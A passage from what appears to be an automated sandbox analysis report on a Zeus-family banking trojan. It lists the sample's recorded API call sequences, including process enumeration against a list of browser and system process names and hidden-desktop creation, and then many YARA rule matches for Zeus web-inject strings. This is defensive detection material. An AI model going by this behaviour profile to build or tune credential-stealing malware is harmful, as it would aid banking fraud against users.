rentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01396370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01396370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01396370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01383510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01383510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01383510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03226370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03226370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03226370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03213510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03213510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03213510
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C786C0 CreateDesktopA,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,2_2_02C786C0

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 2.3.svchost.exe.886000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.nPtwtzGyOdAtB.exe.2f62000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.nPtwtzGyOdAtB.exe.2cf0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.nPtwtzGyOdAtB.exe.2b52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nPtwtzGyOdAtB.exe.26b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.nPtwtzGyOdAtB.exe.3160000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nPtwtzGyOdAtB.exe.1380000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.WlCVLbzNph.exe.5c82a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.44.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.5830000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nPtwtzGyOdAtB.exe.2a60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
